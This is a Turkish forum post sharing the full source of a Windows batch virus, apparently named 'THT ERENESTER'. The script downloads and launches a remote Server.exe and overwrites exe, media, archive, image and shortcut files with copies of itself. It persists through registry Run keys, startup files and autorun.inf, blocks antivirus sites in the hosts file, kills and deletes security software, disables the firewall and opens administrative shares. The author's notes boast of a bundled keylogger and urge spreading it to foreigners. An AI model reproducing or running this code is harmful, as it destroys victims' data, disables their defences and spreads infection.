Kod:
start http://s3.dosya.tc/en2.php?a=server14/ava7sk/Server.exe&b=c21e284483728676b18c62a77b84ffe2
echo result=Msgbox("THT %%%%%%%%%%%%%%%%%%E%%%%%%%%%%%%%%%%%%%%%%R%%%%%%%%%%%%E%%%%%%%%%%%%%%%%N%%%%%%%%%%%%%%%%%%%%%E%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%S%%%%%%%%%%%%%%%%%%%%%%%%%T%%%%%%%%%%%%%%E%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%R%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%",vbOKCancel+vbInformation, "Buna İSİM KOYACAKSANIZ!")>>mssg.vbs
:DEVAM
start mssg.vbs
rem ---------------------------------
rem Tum exelere bulas
assoc .exe=batfile
DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Autoexec.bat bulas
echo start "" %0>>%SystemDrive%\AUTOEXEC.BAT
If Exist "%systemdrive%\AUTOEXEC.BAT" (
copy %0 "%systemroot%\toaDyxpB2.bat"
echo start "" "%systemroot%\toaDyxpB2.bat" >> %systemdrive%\AUTOEXEC.BAT
)
rem ---------------------------------
rem ---------------------------------
rem Calisan anahtarlara bulas
set valinf="rundll32_%random%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d %0 /f > nul
rem ---------------------------------
rem ---------------------------------
rem Tum mp3lere bulas
assoc .mp3=batfile
DIR /S/B %SystemDrive%\*.mp3 >> InfList_mp3.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Tum rarlara bulas
assoc .rar=batfile
DIR /S/B %SystemDrive%\*.rar >> InfList_rar.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_rar.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Tum ziplere bulas
assoc .zip=batfile
DIR /S/B %SystemDrive%\*.zip >> InfList_zip.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_zip.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
copy %0 %windir%\system32\ls.bat
echo 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.symantec.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.free-av.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
echo "<html>" > %windir%\NeCros.html
echo "<head>" >> %windir%\NeCros.html
echo "<title>This Virus was builded with BVG NeCroPhilie</title>" >> %windir%\NeCros.html
echo "</head>" >> %windir%\NeCros.html
echo "<body bgcolor="#64FB12">" >> %windir%\NeCros.html
echo "<p align=center><b><font face=Arial size=7 color="#000000">Bilgisayarin enfeksiyon kapti. Bu Bilgisayar virusler tarafindan el konuldu. </font></b></p>" >> %windir%\NeCros.html
echo "</body>" >> %windir%\NeCros.html
echo "</html>" >> %windir%\NeCros.html
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "%windir%\NeCros.html" /f > nul
copy %0 "%userprofile%\Start Menu\Programs\Startup"
rem ---------------------------------
rem Tum mpeglere bulas
assoc .mpeg=batfile
DIR /S/B %SystemDrive%\*.mpeg >> InfList_mpeg.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mpeg.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Tum mp4lere bulas
assoc .mp4=batfile
DIR /S/B %SystemDrive%\*.mp4 >> InfList_mp4.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp4.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Tum jpglere bulas
assoc .jpg=batfile
DIR /S/B %SystemDrive%\*.jpg >> InfList_jpg.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_jpg.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem LNK Bulas
assoc .lnk=batfile
DIR /S/B %SystemDrive%\*.lnk >> InfList_lnk.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_lnk.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Tum driverlere bulas
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:\
echo [AutoRun] > %%E:\autorun.inf
echo open="%%E:\%0" >> %%E:\autorun.inf
echo action=Open folder to see files... >> %%E:\autorun.inf)
rem ---------------------------------
rem ---------------------------------
rem Tum klasörlere enfeksiyon
Dir %SystemRoot% /s /b > PathHost
For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul
For %%a in (*.*) do copy %0 %%a > nul
Del /f /s /q PathHost > Nul
rem ---------------------------------
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO A R E S
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0
rem ---------------------------------
rem Anti-virüs öldürücü v1
net stop Security Center
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A ekrn*
tskill /A egui*
tskill /A anti
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guar*
tskill /A gcasDt*
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
cls
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
tskill /A sweep*
tskill /A scan*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\ESET\ESET Smart Security\*.exe
del /Q /F C:\Program Files\ESET\ESET Smart Security\*.dll
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem ---------------------------------
tskill /A guard*
tskill /A norton*
copy %0 %windir%\%0
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v Pwner /t REG_SZ /d %windir%\%0 /f >nul
copy %0 %systemroot%\system32\%0
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\system32\%0 >> %systemroot%\win.ini
echo run=%systemroot%\system32\%0 >> %systemroot%\win.ini
PING 127.0.0.1 -n 5
Rem -- 5 Saniyelik bir bekleme suresine ayarli degistirebilirsiniz.. (bu yaziyi silebilirsiniz..)--
start downloads/server.exe
copy %0 "C:\********s and Settings\All Users\Start Menu\Programs\Startup\winlog.bat" > nul
copy %0 "C:\********s and Settings\All Users\Start Menu\Programs\Startup\%random%.bat" > nul
copy %0 "C:\********s and Settings\All Users\Start Menu\Programs\Startup\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\winlog.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\crauto.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\autoexe.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\activedesktop.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\%random%.bat" > nul
If Exist "%systemdrive%\AUTOEXEC.BAT" (
copy %0 "%systemroot%\toaDyxpB.bat"
echo start "" "%systemroot%\toaDyxpB.bat" >> %systemdrive%\AUTOEXEC.BAT
)
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d %0 /f > nul
for /f "tokens=1-1 delims=\" %%a in ("%PATH%") do (Set Root=%%a)
%Root%
IF NOT EXIST "%systemroot%\TheBat.bat" GOTO SavedIt
GOTO END
:SavedIt
REG ADD "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run" /f /v "$peer" /t "REG_SZ" /d "%systemroot%\TheBat.bat"
copy "TheBat.bat" %systemroot%
net share ADMIN$
net share C$
net share IPC$
net share c=c:
copy %0 "%userprofile%\..\All Users\Start Menu\Programs\Startup"
PING 127.0.0.1 -n 5
RemUyarayım bu virüs yakında basın yoluyla ben tarafından yabancı sitelere duyrulup yayılacaktır(en az 6 ay) bilgisayarın her uzantısına karışıyor ve keyloggerimi indirip açıyor bununla kalmayıp 127.0.0.1 engelliyor ve nekadar antivirüs varsa (bilinen ki zaten bilinenler güçlü koruyanlardır) blokluyor kendisi zaten Cryptlenmiş yani son zamanlarda THT ERENESTER adlı bir virüs görürseniz tıklamayın ayriyetten bu virüsü nekadar yabancıya paylaşırsanız iyidir ayrıca keyloggerimi THT S.Modlarına paylaşıp gerekirse iyice yayıp namımızı yaymayı düşünüyorum
Türklere Yaymaya çalışmayın onlara uygulanmayacaktır
Notlarım:
1-Tüm driverlere bulaşır
2-lnk (kısayollara bulaşır)
3-Exe ,inf bulaşır
4-tüm "*.mp*"uzantıları ve tüm video uzantılarına bulaşır
5-Ağa kendini tamamen yayar ve kitler
6-Başlangıçta çalışarak 2 defa(biri normal biride keylog serveri üstünden) Virüsün adını söyler
7-Silinmesi çok zordur Sistem dosyası haline girer ve Systemin .inin uzantısına karışır
8-üvenlik duvarını yıkar
9- üstteki linkim ana virüstür kaynağını isteyen bana ulaşsın
10- Program güncellendi Ve dewam edecektir
11-Exe yapıldı 3 defa crypt çekildi backdoor algılıyor ama pek sorun olmaz sonuçta MusAllAt.exe virüsünden daha iyi yayılmakta dahada crypt çekilecektirÜstte Batcirüs oluşturucu 1.7.00 ilr haxırlsnmıştır diyor o progrsm THT den çıkma zaten ana virüs cryptli oldugundan birtek tht görebiliyor oda bizim nazar PONÇİKİMİZ olsun...
Son düzenleme:
